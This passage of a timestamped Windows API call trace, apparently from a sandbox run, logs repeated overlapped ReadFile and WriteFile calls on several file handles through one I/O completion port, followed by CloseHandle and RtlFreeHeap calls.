lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.975] ReadFile (in: hFile=0x654, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4790020) returned 1 [0147.976] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.976] ReadFile (in: hFile=0x624, lpBuffer=0x48b0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x48b0020 | out: lpBuffer=0x48b0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x48b0020) returned 1 [0147.976] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.976] ReadFile (in: hFile=0x640, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x49d0020) returned 1 [0147.977] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0147.977] WriteFile (in: hFile=0x620, lpBuffer=0x41f0124, nNumberOfBytesToWrite=0x15870, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020) returned 0x0 [0148.007] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.007] WriteFile (in: hFile=0x654, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x7995, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020) returned 1 [0148.012] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.012] ReadFile (in: hFile=0x620, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0148.012] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.012] ReadFile (in: hFile=0x660, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4670020) returned 0x0 [0148.012] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.012] ReadFile (in: hFile=0x654, lpBuffer=0x4790124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4790020) returned 0x0 [0148.012] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0148.012] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0148.013] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0148.013] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4670020) returned 1 [0148.013] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0148.013] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0148.013] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.013] WriteFile (in: hFile=0x620, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020) returned 1 [0148.021] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.021] WriteFile (in: hFile=0x640, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x49d0020) returned 1 [0148.046] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0148.046] CloseHandle (hObject=0x624) returned 1 [0148.062] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0148.063] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0149.053] CloseHandle (hObject=0x1a8) returned 1 [0149.068] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x48b0020) returned 1 [0149.069] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.786] ReadFile (in: hFile=0x65c, lpBuffer=0x49d0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x49d0020) returned 1 [0150.787] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.793] WriteFile (in: hFile=0x618, lpBuffer=0x4790124*, nNumberOfBytesToWrite=0x24a6, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020 | out: lpBuffer=0x4790124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020) returned 1 [0150.813] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0150.817] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4790020) returned 1 [0150.817] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.820] WriteFile (in: hFile=0x618, lpBuffer=0x4790094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020 | out: lpBuffer=0x4790094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4790020) returned 1 [0150.829] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.829] WriteFile (in: hFile=0x65c, lpBuffer=0x49d0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x49d0020 | out: lpBuffer=0x49d0094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x49d0020) returned 1 [0150.834] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.834] CloseHandle (hObject=0x618) returned 1 [0150.855] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4790020) returned 1 [0150.855] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.928] ReadFile (in: hFile=0x670, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x2f30020) returned 1 [0150.928] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.928] ReadFile (in: hFile=0x67c, lpBuffer=0x4280124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4280020) returned 1 [0150.928] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0150.928] WriteFile (in: hFile=0x670, lpBuffer=0x2f30124*, nNumberOfBytesToWrite=0x6c78, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020) returned 1 [0151.077] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.077] ReadFile (in: hFile=0x670, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x2f30020) returned 0x0 [0151.077] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0151.077] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2f30020) returned 1 [0151.077] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.077] WriteFile (in: hFile=0x670, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020) returned 1 [0151.096] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.096] WriteFile (in: hFile=0x680, lpBuffer=0x4700124*, nNumberOfBytesToWrite=0x12f33, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020) returned 1 [0151.102] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.102] ReadFile (in: hFile=0x680, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4700020) returned 0x0 [0151.102] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0151.102] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4700020) returned 1 [0151.102] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.102] WriteFile (in: hFile=0x680, lpBuffer=0x4700094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4700020) returned 1 [0151.106] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.106] CloseHandle (hObject=0x680) returned 1 [0151.109] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4700020) returned 1 [0151.109] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.196] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x41f0020) returned 1 [0151.196] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.196] ReadFile (in: hFile=0x670, lpBuffer=0x4670124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4670020 | out: lpBuffer=0x4670124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4670020) returned 1 [0151.197] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.197] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0124*, nNumberOfBytesToWrite=0x45a6, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020) returned 1 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.289] ReadFile (in: hFile=0x67c, lpBuffer=0x41f0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x41f0020) returned 0x0 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 0 [0151.289] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0151.289] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.289] WriteFile (in: hFile=0x67c, lpBuffer=0x41f0094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020 | out: lpBuffer=0x41f0094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x41f0020) returned 1 [0151.307] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0151.307] CloseHandle (hObject=0x67c) returned 1 [0151.313] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x41f0020) returned 1 [0151.313] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.493] ReadFile (in: hFile=0x670, lpBuffer=0x2f30124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x2f30020) returned 1 [0155.494] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.495] ReadFile (in: hFile=0x680, lpBuffer=0x2880124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x2880020 | out: lpBuffer=0x2880124, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x2880020) returned 0x0 [0155.511] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.511] WriteFile (in: hFile=0x674, lpBuffer=0x4280124*, nNumberOfBytesToWrite=0x7828, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4280020 | out: lpBuffer=0x4280124*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x4280020) returned 1 [0155.514] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.514] WriteFile (in: hFile=0x670, lpBuffer=0x2f30094*, nNumberOfBytesToWrite=0x90, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020 | out: lpBuffer=0x2f30094*, lpNumberOfBytesWritten=0x3d3fb90, lpOverlapped=0x2f30020) returned 1 [0155.520] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.522] CloseHandle (hObject=0x674) returned 1 [0155.528] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x4280020) returned 1 [0155.528] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0155.995] ReadFile (in: hFile=0x134, lpBuffer=0x4700124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4700020 | out: lpBuffer=0x4700124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4700020) returned 1 [0155.995] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.001] ReadFile (in: hFile=0x2e0, lpBuffer=0x4a60124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4a60020 | out: lpBuffer=0x4a60124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4a60020) returned 1 [0156.001] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.004] ReadFile (in: hFile=0x368, lpBuffer=0x4b80124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4b80020 | out: lpBuffer=0x4b80124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4b80020) returned 1 [0156.004] GetQueuedCompletionStatus (in: CompletionPort=0x5e0, lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x3d3fb90, lpCompletionKey=0x3d3fb8c, lpOverlapped=0x3d3fb94) returned 1 [0156.004] ReadFile (in: hFile=0x668, lpBuffer=0x4ca0124, nNumberOfBytesToRead=0x80000, lpNumberOfBytesRead=0x3d3fb90, lpOverlapped=0x4ca0020 | out: lpBuffer=0x4ca0124*, lpNumberOfBytesRead=0x3d3fb90*=0x0, lpOverlapped=0x4ca0020) returned 1 [0156.005] GetQueuedCompletionStatus 